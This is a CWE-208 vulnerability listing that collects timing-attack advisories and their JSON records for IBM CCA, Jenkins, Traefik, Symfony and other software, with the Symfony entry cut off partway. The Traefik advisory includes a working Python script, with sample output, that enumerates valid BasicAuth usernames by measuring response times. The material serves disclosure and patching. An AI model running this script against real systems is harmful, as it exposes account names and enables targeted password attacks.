Common Weakness Enumeration

CWE-208

Allowed

Observable Timing Discrepancy

Abstraction: Base · Status: Incomplete

Two separate operations in a product require different amounts of time to complete, in a way that is observable to an actor and reveals security-relevant information about the state of the product, such as whether a particular operation was successful or not.

306 vulnerabilities reference this CWE, most recent first.

GHSA-C929-WGPC-H7F5

Vulnerability from github – Published: 2025-03-11 03:30 – Updated: 2025-03-11 03:30
VLAI
Details

IBM Common Cryptographic Architecture 7.0.0 through 7.5.51

could allow a remote attacker to obtain sensitive information during the creation of ECDSA signatures to perform a timing-based attack.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-22340"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-11T01:15:33Z",
    "severity": "MODERATE"
  },
  "details": "IBM Common Cryptographic Architecture 7.0.0 through 7.5.51 \n\n\n\ncould allow a remote attacker to obtain sensitive information during the creation of ECDSA signatures to perform a timing-based attack.",
  "id": "GHSA-c929-wgpc-h7f5",
  "modified": "2025-03-11T03:30:49Z",
  "published": "2025-03-11T03:30:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22340"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7185282"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CVW2-XJ8R-MJF7

Vulnerability from github – Published: 2021-03-09 00:45 – Updated: 2023-09-05 22:00
VLAI
Summary
Activerecord-session_store Vulnerable to Timing Attack
Details

The activerecord-session_store (aka Active Record Session Store) component through 1.1.3 for Ruby on Rails does not use a constant-time approach when delivering information about whether a guessed session ID is valid. Consequently, remote attackers can leverage timing discrepancies to achieve a correct guess in a relatively short amount of time. This is a related issue to CVE-2019-16782.

Recommendation

This has been fixed in version 2.0.0. All users are advised to update to this version or later.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.1.3"
      },
      "package": {
        "ecosystem": "RubyGems",
        "name": "activerecord-session_store"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2019-25025"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-03-09T00:45:19Z",
    "nvd_published_at": "2021-03-05T06:15:00Z",
    "severity": "MODERATE"
  },
  "details": "The `activerecord-session_store` (aka Active Record Session Store) component through 1.1.3 for Ruby on Rails does not use a constant-time approach when delivering information about whether a guessed session ID is valid. Consequently, remote attackers can leverage timing discrepancies to achieve a correct guess in a relatively short amount of time. This is a related issue to CVE-2019-16782. \n\n## Recommendation\n\nThis has been fixed in version 2.0.0.  All users are advised to update to this version or later.",
  "id": "GHSA-cvw2-xj8r-mjf7",
  "modified": "2023-09-05T22:00:39Z",
  "published": "2021-03-09T00:45:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25025"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rails/activerecord-session_store/pull/151"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rails/activerecord-session_store/commit/9d4dd113d3010b82daaadf0b0ee6b9fb2afb2160"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/rails/activerecord-session_store"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rails/activerecord-session_store/releases/tag/v2.0.0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/activerecord-session_store/CVE-2019-25025.yml"
    },
    {
      "type": "WEB",
      "url": "https://rubygems.org/gems/activerecord-session_store"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Activerecord-session_store Vulnerable to Timing Attack"
}

GHSA-F9F9-4R63-4QCC

Vulnerability from github – Published: 2022-10-19 19:00 – Updated: 2022-12-16 17:22
VLAI
Summary
Non-constant time webhook token comparison in Jenkins GitLab Plugin
Details

GitLab Plugin 1.5.35 and earlier does not use a constant-time comparison when checking whether the provided and expected webhook token are equal.

This could potentially allow attackers to use statistical methods to obtain a valid webhook token.

GitLab Plugin 1.5.36 uses a constant-time comparison when validating the webhook token.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.5.35"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.jenkins-ci.plugins:gitlab-plugin"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.5.36"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-43411"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203",
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-10-19T22:22:43Z",
    "nvd_published_at": "2022-10-19T16:15:00Z",
    "severity": "LOW"
  },
  "details": "GitLab Plugin 1.5.35 and earlier does not use a constant-time comparison when checking whether the provided and expected webhook token are equal.\n\nThis could potentially allow attackers to use statistical methods to obtain a valid webhook token.\n\nGitLab Plugin 1.5.36 uses a constant-time comparison when validating the webhook token.",
  "id": "GHSA-f9f9-4r63-4qcc",
  "modified": "2022-12-16T17:22:29Z",
  "published": "2022-10-19T19:00:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-43411"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jenkinsci/gitlab-plugin/commit/882f84c6a42b42b74ff7c9803d814f61b8fde0ed"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jenkinsci/gitlab-plugin"
    },
    {
      "type": "WEB",
      "url": "https://www.jenkins.io/security/advisory/2022-10-19/#SECURITY-2877"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2022/10/19/3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Non-constant time webhook token comparison in Jenkins GitLab Plugin"
}

GHSA-FJ6F-6933-839J

Vulnerability from github – Published: 2022-05-24 17:07 – Updated: 2022-12-19 21:06
VLAI
Summary
Non-constant time HMAC comparison
Details

Jenkins 2.218 and earlier, LTS 2.204.1 and earlier does not use a constant-time comparison when checking whether two HMACs are equal. This could potentially allow attackers to use statistical methods to obtain a valid HMAC for an attacker-controlled input value.

Jenkins 2.219, LTS 2.204.2 now uses a constant-time comparison when validating HMACs.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.204.1"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.jenkins-ci.main:jenkins-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.204.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.218"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.jenkins-ci.main:jenkins-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.205"
            },
            {
              "fixed": "2.219"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-2102"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203",
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-12-19T21:06:59Z",
    "nvd_published_at": "2020-01-29T16:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Jenkins 2.218 and earlier, LTS 2.204.1 and earlier does not use a constant-time comparison when checking whether two HMACs are equal. This could potentially allow attackers to use statistical methods to obtain a valid HMAC for an attacker-controlled input value.\n\nJenkins 2.219, LTS 2.204.2 now uses a constant-time comparison when validating HMACs.",
  "id": "GHSA-fj6f-6933-839j",
  "modified": "2022-12-19T21:06:59Z",
  "published": "2022-05-24T17:07:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-2102"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jenkinsci/jenkins/commit/6f35dbb939ebe947bdb1979010b208480f1d0e31"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHBA-2020:0402"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHBA-2020:0675"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2020:0681"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2020:0683"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jenkinsci/jenkins"
    },
    {
      "type": "WEB",
      "url": "https://jenkins.io/security/advisory/2020-01-29/#SECURITY-1660"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2020/01/29/1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Non-constant time HMAC comparison"
}

GHSA-FPJ7-9XM6-8HGR

Vulnerability from github – Published: 2022-01-21 23:38 – Updated: 2023-05-24 14:00
VLAI
Summary
Observable Discrepancy and Observable Timing Discrepancy in Jenkins Configuration as Code Plugin
Details

Jenkins Configuration as Code Plugin prior to 1.55.1, 1.54.1, 1.53.1, and 1.47.1 does not use a constant-time comparison when checking whether two authentication tokens are equal.

This could potentially allow attackers to use statistical methods to obtain a valid authentication token.

Configuration as Code Plugin 1.55.1, 1.54.1, 1.53.1, and 1.47.1 now uses a constant-time comparison when validating authentication tokens.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.jenkins:configuration-as-code"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.55"
            },
            {
              "fixed": "1.55.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "1.55"
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.jenkins:configuration-as-code"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.54"
            },
            {
              "fixed": "1.54.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "1.54"
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.jenkins:configuration-as-code"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.48"
            },
            {
              "fixed": "1.53.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.jenkins:configuration-as-code"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.47.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-23106"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203",
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-01-20T14:42:40Z",
    "nvd_published_at": "2022-01-12T20:15:00Z",
    "severity": "LOW"
  },
  "details": "Jenkins Configuration as Code Plugin prior to 1.55.1, 1.54.1, 1.53.1, and 1.47.1 does not use a constant-time comparison when checking whether two authentication tokens are equal.\n\nThis could potentially allow attackers to use statistical methods to obtain a valid authentication token.\n\nConfiguration as Code Plugin 1.55.1, 1.54.1, 1.53.1, and 1.47.1 now uses a constant-time comparison when validating authentication tokens.",
  "id": "GHSA-fpj7-9xm6-8hgr",
  "modified": "2023-05-24T14:00:21Z",
  "published": "2022-01-21T23:38:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23106"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jenkinsci/configuration-as-code-plugin/commit/4f425675edf77d382a6fd10890f1a704ff3b2277"
    },
    {
      "type": "WEB",
      "url": "https://github.com/CVEProject/cvelist/blob/00bfb5abeecc9f553a2f42954ee540e493498ee9/2022/23xxx/CVE-2022-23106.json"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jenkinsci/configuration-as-code-plugin"
    },
    {
      "type": "WEB",
      "url": "https://www.jenkins.io/security/advisory/2022-01-12/#SECURITY-2141"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2022/01/12/6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Observable Discrepancy and Observable Timing Discrepancy in Jenkins Configuration as Code Plugin"
}

GHSA-FW6M-5FQ2-8FQR

Vulnerability from github – Published: 2025-08-29 12:31 – Updated: 2025-08-29 12:31
VLAI
Details

Padding oracle attack vulnerability in Oberon microsystem AG’s ocrypto library in all versions since 3.1.0 and prior to 3.9.2 allows an attacker to recover plaintexts via timing measurements of AES-CBC PKCS#7 decrypt operations.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-7071"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-29T10:15:32Z",
    "severity": "MODERATE"
  },
  "details": "Padding oracle attack vulnerability in Oberon microsystem AG\u2019s ocrypto library in all versions since 3.1.0 and prior to 3.9.2 allows an attacker to recover plaintexts via timing measurements of AES-CBC PKCS#7 decrypt operations.",
  "id": "GHSA-fw6m-5fq2-8fqr",
  "modified": "2025-08-29T12:31:11Z",
  "published": "2025-08-29T12:31:11Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7071"
    },
    {
      "type": "WEB",
      "url": "https://www.oberon.ch/security-advisories/cve-2025-7071"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-G3HG-J4JV-CWFR

Vulnerability from github – Published: 2026-03-20 15:43 – Updated: 2026-03-20 15:43
VLAI
Summary
Traefik Affected by BasicAuth Middleware Timing Attack Allows Username Enumeration
Details

Summary

There is a potential vulnerability in Traefik's BasicAuth middleware that allows username enumeration via a timing attack.

When a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames.

Patches

  • https://github.com/traefik/traefik/releases/tag/v2.11.41
  • https://github.com/traefik/traefik/releases/tag/v3.6.11
  • https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2

For more information

If you have any questions or comments about this advisory, please open an issue.

Original Description ### Summary A timing attack vulnerability exists in Traefik's BasicAuth middleware that allows unauthenticated attackers to enumerate valid usernames. When a username exists, bcrypt password verification takes ~166ms; when it doesn't exist, the response returns immediately in ~0.6ms. This ~298x timing difference enables reliable username enumeration. ### Details The vulnerability exists in the BasicAuth middleware implementation. When validating credentials: - User exists: The system performs bcrypt password comparison, which intentionally takes ~100-200ms due to bcrypt's design - User doesn't exist: The system immediately returns authentication failure in ~0.6ms This timing difference is observable over the network and allows attackers to distinguish between valid and invalid usernames. Root Cause: The code returns early when the user is not found, without performing a dummy bcrypt comparison to maintain constant-time execution. Expected behavior: The system should perform a bcrypt comparison regardless of whether the user exists, to maintain consistent response times. ### PoC Environment: - Traefik v3.6.9 - k3s v1.34.5 Configuration:
apiVersion: traefik.io/v1alpha1
kind: Middleware
metadata:
  name: basicauth
  namespace: traefik-poc
spec:
  basicAuth:
    secret: basic-auth-secret
---
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: test-basicauth
  annotations:
    traefik.ingress.kubernetes.io/router.middlewares: traefik-poc-basicauth@kubernetescrd
spec:
  ingressClassName: traefik
  rules:
    - http:
        paths:
          - path: /protected
            pathType: Prefix
            backend:
              service:
                name: whoami
                port:
                  number: 80
PoC Script:
#!/usr/bin/env python3
import requests
import time
import statistics
import sys
TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:30080/protected"
TEST_USERS = ["admin", "root", "test", "nonexistent12345"]
SAMPLES = 20
def measure_time(username, password="wrongpassword"):
    times = []
    for _ in range(SAMPLES):
        start = time.perf_counter()
        requests.get(TARGET, auth=(username, password), timeout=5)
        elapsed = time.perf_counter() - start
        times.append(elapsed)
    return statistics.median(times)
print(f"Target: {TARGET}")
print(f"Samples per user: {SAMPLES}\n")
for user in TEST_USERS:
    median = measure_time(user)
    if median > 0.05:  # bcrypt threshold
        status = "[+] EXISTS (slow - bcrypt verification)"
    else:
        status = "[-] NOT FOUND (fast - immediate return)"
    print(f"{status}: {user:20s} | median={median:.4f}s")
Execution Results:
Target: http://10.10.10.7:30080/protected
Samples per user: 20

[+] EXISTS (slow - bcrypt verification): admin         | median=0.1665s
[-] NOT FOUND (fast - immediate return): root          | median=0.0006s
[-] NOT FOUND (fast - immediate return): test          | median=0.0006s
[-] NOT FOUND (fast - immediate return): nonexistent   | median=0.0006s

Timing difference ratio: 298.0x
### Impact - **Vulnerability Type:** Information Disclosure via Timing Attack (CWE-208) - **Impact:** - Attackers can enumerate valid usernames without authentication - Enables targeted password brute-force attacks against confirmed accounts - Exposes information about system user structure - **Who is impacted:** All users of Traefik's BasicAuth middleware are affected. The vulnerability requires: - BasicAuth middleware enabled - Attacker able to make requests to protected endpoints - Network access to measure response times - **Attack Complexity:** Low - only requires sending HTTP requests and measuring response times - **Privileges Required:** None - **User Interaction:** None
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.7.34"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.11.40"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.11.41"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.6.10"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.6.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.7.0-ea.1"
            },
            {
              "fixed": "3.7.0-ea.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32595"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-20T15:43:13Z",
    "nvd_published_at": "2026-03-20T11:18:02Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThere is a potential vulnerability in Traefik\u0027s BasicAuth middleware that allows username enumeration via a timing attack.\n\nWhen a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.41\n- https://github.com/traefik/traefik/releases/tag/v3.6.11\n- https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\n\n## For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Description\u003c/summary\u003e\n\n### Summary\nA timing attack vulnerability exists in Traefik\u0027s BasicAuth middleware that allows unauthenticated attackers to enumerate valid usernames. When a username exists, bcrypt password verification takes ~166ms; when it doesn\u0027t exist, the response returns immediately in ~0.6ms. This ~298x timing difference enables reliable username enumeration.\n\n### Details\nThe vulnerability exists in the BasicAuth middleware implementation. When validating credentials:\n- User exists: The system performs bcrypt password comparison, which intentionally takes ~100-200ms due to bcrypt\u0027s design\n- User doesn\u0027t exist: The system immediately returns authentication failure in ~0.6ms\n\nThis timing difference is observable over the network and allows attackers to distinguish between valid and invalid usernames.\n\nRoot Cause: The code returns early when the user is not found, without performing a dummy bcrypt comparison to maintain constant-time execution.\n\nExpected behavior: The system should perform a bcrypt comparison regardless of whether the user exists, to maintain consistent response times.\n\n### PoC\nEnvironment:\n- Traefik v3.6.9\n- k3s v1.34.5\n\nConfiguration:\n```yaml\napiVersion: traefik.io/v1alpha1\nkind: Middleware\nmetadata:\n  name: basicauth\n  namespace: traefik-poc\nspec:\n  basicAuth:\n    secret: basic-auth-secret\n---\napiVersion: networking.k8s.io/v1\nkind: Ingress\nmetadata:\n  name: test-basicauth\n  annotations:\n    traefik.ingress.kubernetes.io/router.middlewares: traefik-poc-basicauth@kubernetescrd\nspec:\n  ingressClassName: traefik\n  rules:\n    - http:\n        paths:\n          - path: /protected\n            pathType: Prefix\n            backend:\n              service:\n                name: whoami\n                port:\n                  number: 80\n```\n\nPoC Script:\n```python\n#!/usr/bin/env python3\nimport requests\nimport time\nimport statistics\nimport sys\nTARGET = sys.argv[1] if len(sys.argv) \u003e 1 else \"http://localhost:30080/protected\"\nTEST_USERS = [\"admin\", \"root\", \"test\", \"nonexistent12345\"]\nSAMPLES = 20\ndef measure_time(username, password=\"wrongpassword\"):\n    times = []\n    for _ in range(SAMPLES):\n        start = time.perf_counter()\n        requests.get(TARGET, auth=(username, password), timeout=5)\n        elapsed = time.perf_counter() - start\n        times.append(elapsed)\n    return statistics.median(times)\nprint(f\"Target: {TARGET}\")\nprint(f\"Samples per user: {SAMPLES}\\n\")\nfor user in TEST_USERS:\n    median = measure_time(user)\n    if median \u003e 0.05:  # bcrypt threshold\n        status = \"[+] EXISTS (slow - bcrypt verification)\"\n    else:\n        status = \"[-] NOT FOUND (fast - immediate return)\"\n    print(f\"{status}: {user:20s} | median={median:.4f}s\")\n```\n\nExecution Results:\n```\nTarget: http://10.10.10.7:30080/protected\nSamples per user: 20\n\n[+] EXISTS (slow - bcrypt verification): admin         | median=0.1665s\n[-] NOT FOUND (fast - immediate return): root          | median=0.0006s\n[-] NOT FOUND (fast - immediate return): test          | median=0.0006s\n[-] NOT FOUND (fast - immediate return): nonexistent   | median=0.0006s\n\nTiming difference ratio: 298.0x\n```\n\n### Impact\n- **Vulnerability Type:** Information Disclosure via Timing Attack (CWE-208)\n- **Impact:**\n  - Attackers can enumerate valid usernames without authentication\n  - Enables targeted password brute-force attacks against confirmed accounts\n  - Exposes information about system user structure\n- **Who is impacted:** All users of Traefik\u0027s BasicAuth middleware are affected. The vulnerability requires:\n  - BasicAuth middleware enabled\n  - Attacker able to make requests to protected endpoints\n  - Network access to measure response times\n- **Attack Complexity:** Low - only requires sending HTTP requests and measuring response times\n- **Privileges Required:** None\n- **User Interaction:** None\n\n\u003c/details\u003e\n\n---",
  "id": "GHSA-g3hg-j4jv-cwfr",
  "modified": "2026-03-20T15:43:14Z",
  "published": "2026-03-20T15:43:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/security/advisories/GHSA-g3hg-j4jv-cwfr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32595"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/traefik/traefik"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v2.11.41"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.6.11"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Traefik Affected by BasicAuth Middleware Timing Attack Allows Username Enumeration"
}

GHSA-G97C-JFX6-XVXH

Vulnerability from github – Published: 2022-05-17 03:25 – Updated: 2023-08-03 21:48
VLAI
Summary
Symfony Vulnerable to Timing Attack
Details

Symfony 2.3.x before 2.3.35, 2.6.x before 2.6.12, and 2.7.x before 2.7.7 might allow remote attackers to have unspecified impact via a timing attack involving the (1) Symfony/Component/Security/Http/RememberMe/PersistentTokenBasedRememberMeServices or (2) Symfony/Component/Security/Http/Firewall/DigestAuthenticationListener class in the Symfony Security Component, or (3) legacy CSRF implementation from the Symfony/Component/Form/Extension/Csrf/CsrfProvider/DefaultCsrfProvider class in the Symfony Form component.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "symfony/symfony"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.3.0"
            },
            {
              "fixed": "2.3.35"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "symfony/symfony"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.7.0"
            },
            {
              "fixed": "2.7.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "symfony/form"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.3.0"
            },
            {
              "fixed": "2.3.35"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "symfony/form"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.4.0"
            },
            {
              "fixed": "2.6.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "symfony/form"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.7.0"
            },
            {
              "fixed": "2.7.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "symfony/security-http"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.4.0"
            },
            {
              "fixed": "2.6.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "symfony/security-http"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.7.0"
            },
            {
              "fixed": "2.7.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "symfony/security"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.3.0"
            },
            {
              "fixed": "2.3.35"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "symfony/security"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.4.0"
            },
            {
              "fixed": "2.6.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "symfony/security"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.7.0"
            },
            {
              "fixed": "2.7.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "symfony/symfony"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.4.0"
            },
            {
              "fixed": "2.6.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2015-8125"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-08-03T21:48:26Z",
    "nvd_published_at": "2015-12-07T20:59:00Z",
    "severity": "HIGH"
  },
  "details": "Symfony 2.3.x before 2.3.35, 2.6.x before 2.6.12, and 2.7.x before 2.7.7 might allow remote attackers to have unspecified impact via a timing attack involving the (1) `Symfony/Component/Security/Http/RememberMe/PersistentTokenBasedRememberMeServices` or (2) `Symfony/Component/Security/Http/Firewall/DigestAuthenticationListener` class in the Symfony Security Component, or (3) legacy CSRF implementation from the `Symfony/Component/Form/Extension/Csrf/CsrfProvider/DefaultCsrfProvider` class in the Symfony Form component.",
  "id": "GHSA-g97c-jfx6-xvxh",
  "modified": "2023-08-03T21:48:26Z",
  "published": "2022-05-17T03:25:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8125"
    },
    {
      "type": "WEB",
      "url": "https://github.com/symfony/symfony/pull/16630"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/form/CVE-2015-8125.yaml"
    },
    {
      "type": "WEB",
